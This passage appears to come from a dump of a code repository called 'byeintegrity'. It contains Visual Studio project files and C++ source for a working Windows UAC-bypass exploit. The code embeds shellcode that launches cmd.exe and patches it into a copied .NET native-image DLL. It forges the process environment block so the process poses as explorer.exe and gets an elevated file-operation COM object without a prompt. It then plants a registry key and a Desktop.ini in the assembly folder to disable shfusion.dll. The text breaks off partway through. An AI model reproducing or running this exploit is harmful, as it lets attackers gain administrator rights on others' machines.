Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <CompileAs>Default</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <CompileAs>Default</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <CompileAs>Default</CompileAs>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <AdditionalDependencies>shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <CompileAs>Default</CompileAs>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <AdditionalDependencies>shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  
<ItemGroup>\n    <ClCompile Include=\"integritybye.cpp\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"shellcode.txt\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "byeintegrity/byeintegrity.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <ClCompile Include=\"integritybye.cpp\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"shellcode.txt\" />\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "byeintegrity/integritybye.cpp",
    "content": "#include <Windows.h>\n#include <Shlwapi.h>\n#include <ShlObj.h>\n#include <ShObjIdl.h>\n#include <iostream>\n#include <string>\n\n#pragma region NT Stuff\ntypedef struct _UNICODE_STRING\n{\n\tunsigned short Length;\n\tunsigned short MaximumLength;\n\tlong Padding_8;\n\twchar_t* Buffer;\n} UNICODE_STRING, * PUNICODE_STRING;\n\ntypedef struct _CURDIR\n{\n\tstruct _UNICODE_STRING DosPath;\n\tvoid* Handle;\n} CURDIR, * PCURDIR;\n\ntypedef struct _STRING\n{\n\tunsigned short Length;\n\tunsigned short MaximumLength;\n\tlong Padding_94;\n\tchar* Buffer;\n} STRING, * PSTRING;\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR\n{\n\tunsigned short Flags;\n\tunsigned short Length;\n\tunsigned long TimeStamp;\n\tstruct _STRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\n{\n\tunsigned long MaximumLength;\n\tunsigned long Length;\n\tunsigned long Flags;\n\tunsigned long DebugFlags;\n\tvoid* ConsoleHandle;\n\tunsigned long ConsoleFlags;\n\tlong Padding_95;\n\tvoid* StandardInput;\n\tvoid* StandardOutput;\n\tvoid* StandardError;\n\tstruct _CURDIR CurrentDirectory;\n\tstruct _UNICODE_STRING DllPath;\n\tstruct _UNICODE_STRING ImagePathName;\n\tstruct _UNICODE_STRING CommandLine;\n\tvoid* Environment;\n\tunsigned long StartingX;\n\tunsigned long StartingY;\n\tunsigned long CountX;\n\tunsigned long CountY;\n\tunsigned long CountCharsX;\n\tunsigned long CountCharsY;\n\tunsigned long FillAttribute;\n\tunsigned long WindowFlags;\n\tunsigned long ShowWindowFlags;\n\tlong Padding_96;\n\tstruct _UNICODE_STRING WindowTitle;\n\tstruct _UNICODE_STRING DesktopInfo;\n\tstruct _UNICODE_STRING ShellInfo;\n\tstruct _UNICODE_STRING RuntimeData;\n\tstruct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];\n\tunsigned __int64 EnvironmentSize;\n\tunsigned __int64 EnvironmentVersion;\n\tvoid* PackageDependencyData;\n\tunsigned long ProcessGroupId;\n\tunsigned long LoaderThreads;\n\tstruct _UNICODE_STRING 
RedirectionDllName;\n\tstruct _UNICODE_STRING HeapPartitionName;\n\tunsigned __int64* DefaultThreadpoolCpuSetMasks;\n\tunsigned long DefaultThreadpoolCpuSetMaskCount;\n\tlong __PADDING__[1];\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\nconstexpr auto PEB_OFFSET = 0x60ULL;\nconstexpr auto PROCESS_PARAM_OFFSET = 0x20ULL;\nconstexpr auto BASENAME_OFFSET = 0x58ULL;\nconstexpr auto FULLNAME_OFFSET = 0x48ULL;\nconstexpr auto DLL_BASE_OFFSET = 0x30ULL;\n#pragma endregion\n\nusing RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR);\nusing LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN);\nusing LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID);\n\nstruct LDR_CALLBACK_PARAMS\n{\n\tPCWCHAR ExplorerPath;\n\tPVOID ImageBase;\n\tRtlInitUnicodeStringPtr RtlInitUnicodeString;\n};\n\nconst BYTE SHELL_CODE[] = {\n\t\t\t   0x80, 0xFA, 0x01, 0x0F, 0x85, 0xA1, 0x00, 0x00, 0x00, 0x57, 0x48, 0x81, 0xEC, 0xE0, 0x00, 0x00, 0x00,\n\t\t\t   0x48, 0x8D, 0x44, 0x24, 0x70, 0x48, 0x89, 0xC7, 0x31, 0xC0, 0xB9, 0x68, 0x00, 0x00, 0x00, 0xF3, 0xAA,\n\t\t\t   0xC7, 0x44, 0x24, 0x70, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x44, 0x24, 0x50, 0x48, 0x89, 0x44, 0x24,\n\t\t\t   0x48, 0x48, 0x8D, 0x44, 0x24, 0x70, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00,\n\t\t\t   0x00, 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,\n\t\t\t   0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x31, 0xC9, 0x45, 0x31, 0xC0,\n\t\t\t   0x31, 0xD2, 0x48, 0x8D, 0x0D, 0x41, 0x00, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x30, 0x00, 0x00,\n\t\t\t   0x00, 0x48, 0x83, 0xC0, 0x60, 0x48, 0x8B, 0x00, 0x48, 0x83, 0xC0, 0x18, 0x48, 0x8B, 0x00, 0x48, 0x8B,\n\t\t\t   0x40, 0x10, 0x48, 0x8B, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x4D, 0x31, 0xE4, 0x41, 0xBC,\n\t\t\t   0xEF, 0xBE, 0xAD, 0xDE, 0x4C, 0x01, 0xE0, 0xFF, 0xD0, 0x48, 0x81, 0xC4, 0xE0, 0x00, 0x00, 0x00, 
0x5F,\n\t\t\t   0x48, 0x31, 0xC0, 0xB0, 0x01, 0xC3\n};\n\nvoid CreateElevatedCopyObject(IFileOperation** fileOperation)\n{\n\tstd::wstring command{ L\"Elevation:Administrator!new:\" };\n\tWCHAR clsid[40];\n\tBIND_OPTS3 bind;\n\n\tif (!StringFromGUID2(CLSID_FileOperation, clsid, sizeof clsid / sizeof(WCHAR)))\n\t{\n\t\t*fileOperation = nullptr;\n\t\tstd::cout << \"Cannot create CLSID string\\n\";\n\t\treturn;\n\t}\n\n\tcommand += clsid;\n\n\tZeroMemory(&bind, sizeof(BIND_OPTS3));\n\tbind.cbStruct = sizeof(BIND_OPTS3);\n\tbind.dwClassContext = CLSCTX_LOCAL_SERVER;\n\n\tconst auto result = CoGetObject(command.c_str(), &bind, IID_IFileOperation, reinterpret_cast<void**>(fileOperation));\n\tif (FAILED(result))\n\t\tstd::cout << \"CoGetObject() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n}\n\nvoid ForgeProcessInformation(const PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString,\n\tconst LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules)\n{\n\tconst auto pPeb = *reinterpret_cast<PBYTE*>(reinterpret_cast<PBYTE>(NtCurrentTeb()) + PEB_OFFSET);\n\tauto pProcessParams = *reinterpret_cast<PRTL_USER_PROCESS_PARAMETERS*>(pPeb + PROCESS_PARAM_OFFSET);\n\n\tRtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath);\n\tRtlInitUnicodeString(&pProcessParams->CommandLine, L\"explorer.exe\");\n\n\tLDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString };\n\n\tLdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop)\n\t\t{\n\t\t\tauto* params = static_cast<LDR_CALLBACK_PARAMS*>(context);\n\n\t\t\tif (*reinterpret_cast<PULONG_PTR>(reinterpret_cast<ULONG_PTR>(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast<\n\t\t\t\tULONG_PTR>(params->ImageBase))\n\t\t\t{\n\t\t\t\tconst auto baseName = reinterpret_cast<PUNICODE_STRING>(static_cast<PBYTE>(ldrEntry) + BASENAME_OFFSET),\n\t\t\t\t\tfullName = reinterpret_cast<PUNICODE_STRING>(static_cast<PBYTE>(ldrEntry) + 
FULLNAME_OFFSET);\n\n\t\t\t\tparams->RtlInitUnicodeString(baseName, L\"explorer.exe\");\n\t\t\t\tparams->RtlInitUnicodeString(fullName, params->ExplorerPath);\n\n\t\t\t\t*stop = TRUE;\n\t\t\t}\n\t\t}, reinterpret_cast<PVOID>(&params));\n}\n\nint ChildMain(const PWCHAR commandLine)\n{\n\tPWSTR path;\n\tif (FAILED(SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &path)))\n\t\treturn EXIT_FAILURE;\n\n\tstd::wstring explorer{ path };\n\texplorer += L\"\\\\explorer.exe\";\n\tCoTaskMemFree(path);\n\n\tSHELLSTATEW shellState;\n\tshellState.fNoConfirmRecycle = TRUE;\n\tSHGetSetSettings(&shellState, SSF_NOCONFIRMRECYCLE, TRUE);\n\n\tForgeProcessInformation(explorer.c_str(),\n\t\treinterpret_cast<RtlInitUnicodeStringPtr>(\n\t\t\tGetProcAddress(GetModuleHandleW(L\"ntdll.dll\"), \"RtlInitUnicodeString\")),\n\t\treinterpret_cast<LdrEnumerateLoadedModulesPtr>(GetProcAddress(\n\t\t\tGetModuleHandleW(L\"ntdll.dll\"), \"LdrEnumerateLoadedModules\")));\n\n\tif (FAILED(CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY)))\n\t\treturn EXIT_FAILURE;\n\n\tIFileOperation* fileOperation;\n\tCreateElevatedCopyObject(&fileOperation);\n\tif (!fileOperation)\n\t{\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tIShellItem* item;\n\tif (FAILED(SHCreateItemFromParsingName(commandLine + 7, nullptr, IID_IShellItem, reinterpret_cast<void**>(&item))))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\tif (FAILED(fileOperation->DeleteItem(item, nullptr)))\n\t{\n\t\titem->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\tif (FAILED(fileOperation->PerformOperations()))\n\t{\n\t\titem->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\titem->Release();\n\tfileOperation->Release();\n\tCoUninitialize();\n\n\treturn 0;\n}\n\nint wmain(int, wchar_t* argv[])\n{\n\tif (wcscmp(argv[0], L\"delete\") == 
0)\n\t\treturn ChildMain(argv[0]);\n\tif (wcscmp(argv[0], L\"launch\") == 0)\n\t{\n\t\tif (reinterpret_cast<int>(ShellExecuteW(nullptr, L\"open\", L\"mmc.exe\", L\"WF.msc\", nullptr, SW_HIDE)) <= 32)\n\t\t\treturn EXIT_FAILURE;\n\n\t\treturn 0;\n\t}\n\n\t/* Locals */\n\tPWSTR path, systemPath;\n\tHRESULT result;\n\tstd::wstring fullPath, cmdPath, explorer, fusionIni;\n\tWIN32_FIND_DATAW findData;\n\tHANDLE findHandle, fileHandle, mapping;\n\tPVOID pTargetFile;\n\tPIMAGE_NT_HEADERS headers;\n\tPIMAGE_SECTION_HEADER section;\n\tPBYTE zeroBlock;\n\tRtlInitUnicodeStringPtr RtlInitUnicodeString;\n\tLdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules;\n\tIFileOperation* fileOperation;\n\tLSTATUS status;\n\tDWORD openResult;\n\tHKEY userKey;\n\tIShellItem* assemblyFolder, * dummyFile;\n\tULONG_PTR requiredSize;\n\tPWCHAR currentDirectory;\n\tIShellItem* existingFile, * targetFile, * targetFolder;\n\tSTARTUPINFOW startupInfo{ sizeof STARTUPINFOW, nullptr };\n\tPROCESS_INFORMATION processInfo;\n\tstd::wstring launchCmd{ L\"delete \" };\n\tDWORD exitCode;\n\n\t/*\n\t *\tSTAGE 1\n\t *\tFind the target DLL file's path.\n\t */\n\n\tresult = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &path);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"SHGetKnownFolderPath() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"SHGetKnownFolderPath() (1) failed. 
HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfullPath = path;\n\tcmdPath = systemPath;\n\texplorer = path;\n\tfusionIni = path;\n\tfullPath += L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\";\n\tcmdPath += L\"\\\\cmd.exe\";\n\texplorer += L\"\\\\explorer.exe\";\n\tfusionIni += L\"\\\\assembly\\\\Desktop.ini\";\n\tCoTaskMemFree(path);\n\tCoTaskMemFree(systemPath);\n\ntryagain:\n\tfindHandle = FindFirstFileW(fullPath.c_str(), &findData);\n\tif (findHandle == INVALID_HANDLE_VALUE)\n\t{\n\t\tif (fullPath.find(L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\") != std::string::npos)\n\t\t{\n\t\t\tfullPath = fullPath.substr(0, fullPath.find(L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\"));\n\t\t\tfullPath += L\"\\\\assembly\\\\NativeImages_v2.0.50727_64\\\\Accessibility\\\\*.*\";\n\t\t\tgoto tryagain;\n\t\t}\n\t\tstd::cout << \"FindFirstFileW() failed. Last error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfor (auto i = 0; i != 2; ++i)\n\t{\n\t\tif (!FindNextFileW(findHandle, &findData))\n\t\t{\n\t\t\tif (GetLastError() == ERROR_NO_MORE_FILES)\n\t\t\t\tstd::wcout << \"No token folder exists under \" << fullPath.c_str() << std::endl;\n\t\t\telse\n\t\t\t\tstd::cout << \"FindNextFileW() failed. Error: \" << GetLastError() << std::endl;\n\n\t\t\tFindClose(findHandle);\n\t\t\treturn EXIT_FAILURE;\n\t\t}\n\t}\n\n\tfullPath.pop_back();\n\tfullPath.pop_back();\n\tfullPath.pop_back();\n\tfullPath += findData.cFileName;\n\tfullPath += L\"\\\\Accessibility.ni.dll\";\n\n\tFindClose(findHandle);\n\n\t/*\n\t *\tEND STAGE 1\n\t */\n\n\t /*\n\t  *\tSTAGE 2\n\t  *\tCopy the target dll, infect it and save it as \"infect.dll\".\n\t  */\n\n\tif (!CopyFileW(fullPath.c_str(), L\"infect.dll\", FALSE))\n\t{\n\t\tstd::wcout << L\"Failed to copy \" << fullPath.c_str() << L\" to the current directory. 
Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfileHandle = CreateFileW(L\"infect.dll\", FILE_READ_ACCESS | FILE_WRITE_ACCESS, 0, nullptr, OPEN_EXISTING,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr);\n\tif (fileHandle == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::cout << \"Failed to open 'infect.dll'. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tmapping = CreateFileMappingW(fileHandle, nullptr, PAGE_READWRITE, 0, 0, nullptr);\n\tif (!mapping)\n\t{\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"CreateFileMapping() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tpTargetFile = MapViewOfFile(mapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);\n\tif (!pTargetFile)\n\t{\n\t\tCloseHandle(mapping);\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"MapViewOfFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\theaders = reinterpret_cast<PIMAGE_NT_HEADERS>(static_cast<PBYTE>(pTargetFile) + static_cast<\n\t\tPIMAGE_DOS_HEADER>(pTargetFile)->e_lfanew);\n\n\tsection = IMAGE_FIRST_SECTION(headers);\n\twhile (std::strcmp(\".text\", reinterpret_cast<char const*>(section->Name)))\n\t\t++section;\n\n\tzeroBlock = static_cast<PBYTE>(pTargetFile) + section->PointerToRawData;\n\n\tfor (; ++zeroBlock;)\n\t{\n\t\tauto fail = false;\n\t\tfor (auto* z = zeroBlock; z != zeroBlock + sizeof SHELL_CODE + (cmdPath.size() * 2) + sizeof(L'\\0'); ++z)\n\t\t{\n\t\t\tif (*z)\n\t\t\t{\n\t\t\t\tfail = true;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (!fail)\n\t\t\tbreak;\n\t}\n\n\tmemcpy(zeroBlock, SHELL_CODE, sizeof SHELL_CODE);\n\tmemcpy(zeroBlock + sizeof SHELL_CODE, cmdPath.c_str(), (cmdPath.size() * 2) + sizeof(L'\\0'));\n\n\t*reinterpret_cast<PDWORD>(zeroBlock + 0x99) = static_cast<DWORD>(reinterpret_cast<PBYTE>(CreateProcessW) -\n\t\treinterpret_cast<PBYTE>(GetModuleHandleW(L\"kernel32.dll\")));\n\n\tauto offset = static_cast<DWORD>(zeroBlock - 
static_cast<PBYTE>(pTargetFile));\n\toffset -= section->PointerToRawData;\n\toffset += section->VirtualAddress;\n\theaders->OptionalHeader.AddressOfEntryPoint = offset;\n\n\tif (!FlushViewOfFile(pTargetFile, 0))\n\t{\n\t\tUnmapViewOfFile(pTargetFile);\n\t\tCloseHandle(mapping);\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"FlushViewOfFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tUnmapViewOfFile(pTargetFile);\n\tCloseHandle(mapping);\n\tCloseHandle(fileHandle);\n\n\t/*\n\t *\tEND STAGE 2\n\t */\n\n\t /*\n\t  *\tSTAGE 3\n\t  *\tForge process information to allow IFileOperation as Administrator w/o UAC prompt.\n\t  */\n\n\tRtlInitUnicodeString = reinterpret_cast<RtlInitUnicodeStringPtr>(GetProcAddress(\n\t\tGetModuleHandleW(L\"ntdll.dll\"), \"RtlInitUnicodeString\"));\n\tLdrEnumerateLoadedModules = reinterpret_cast<LdrEnumerateLoadedModulesPtr>(GetProcAddress(\n\t\tGetModuleHandleW(L\"ntdll.dll\"), \"LdrEnumerateLoadedModules\"));\n\n\tForgeProcessInformation(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules);\n\n\tresult = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"CoInitializeEx() failed. 
HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tCreateElevatedCopyObject(&fileOperation);\n\tif (!fileOperation)\n\t{\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 3\n\t */\n\n\t /*\n\t  *\tSTAGE 4\n\t  *\tCreate a registry key that allows us to bypass the shfusion.dll restriction.\n\t  *\tOnly do this if the \"desktop.ini\" exists in the folder.\n\t  */\n\n\tif (!PathFileExistsW(fusionIni.c_str()))\n\t\tgoto DoAttackDirect;\n\n\tif ((status = RegCreateKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", 0, nullptr,\n\t\tREG_OPTION_NON_VOLATILE, KEY_CREATE_SUB_KEY | KEY_SET_VALUE, nullptr, &userKey, &openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (0) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegSetValueExW(userKey, nullptr, 0, REG_SZ, reinterpret_cast<const BYTE*>(L\"\"), sizeof(L\"\"))))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegSetValueExW() (0) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegCreateKeyExW(userKey, L\"Server\", 0, nullptr, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr,\n\t\t&userKey,\n\t\t&openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (1) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegSetValueExW(userKey, nullptr, 0, REG_SZ, reinterpret_cast<const BYTE*>(L\"\"), sizeof(L\"\"))))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegSetValueExW() (1) failed. 
Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tRegCloseKey(userKey);\n\n\t/*\n\t *\tEND STAGE 4\n\t */\n\n\t /*\n\t  *\tBEGIN STAGE 5\n\t  *\tForce copy new Desktop.ini into assembly folder to disable shfusion.dll via IFileOperation bug.\n\t  */\n\n\tCreateDirectoryW(L\"byeinteg_files\", nullptr);\n\n\tCloseHandle(CreateFileW(L\"byeinteg_files\\\\Desktop.ini\", FILE_WRITE_ACCESS, 0, nullptr, CREATE_ALWAYS,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr));\n\texplorer = explorer.substr(0, explorer.find(L\"explorer.exe\"));\n\texplorer += L\"assembly\";\n\n\tresult = SHCreateItemFromParsingName(explorer.c_str(), nullptr, IID_IShellItem, reinterpret_cast<void**>(&assemblyFolder));\n\tif (FAILED(result))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\trequiredSize = static_cast<ULONG_PTR>(GetCurrentDirectoryW(0, nullptr));\n\tcurrentDirectory = new WCHAR[requiredSize + 27];\n\tGetCurrentDirectoryW(static_cast<DWORD>(requiredSize), currentDirectory);\n\twcscat_s(currentDirectory, requiredSize + 27, L\"\\\\byeinteg_files\\\\Desktop.ini\");\n\n\tresult = SHCreateItemFromParsingName(currentDirectory, nullptr, IID_IShellItem, reinterpret_cast<void**>(&dummyFile));\n\tdelete[] currentDirectory;\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (1) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tresult = fileOperation->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI);\n\tif (FAILED(result))\n\t{\n\t\tdummyFile->Release();\n\t\tassemblyFolder->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::SetOperationFlags() failed. 
HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->CopyItem(dummyFile, assemblyFolder, nullptr, nullptr);\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tdummyFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::CopyItem() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->PerformOperations();\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tdummyFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::PerformOperations() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tassemblyFolder->Release();\n\tdummyFile->Release();\n\n\t/*\n\t *\tEND STAGE 5\n\t */\n\n\t /*\n\t  *\tBEGIN STAGE 6\n\t  *\tUndo changes to the registry so we can browse the assembly folder completely normally.\n\t 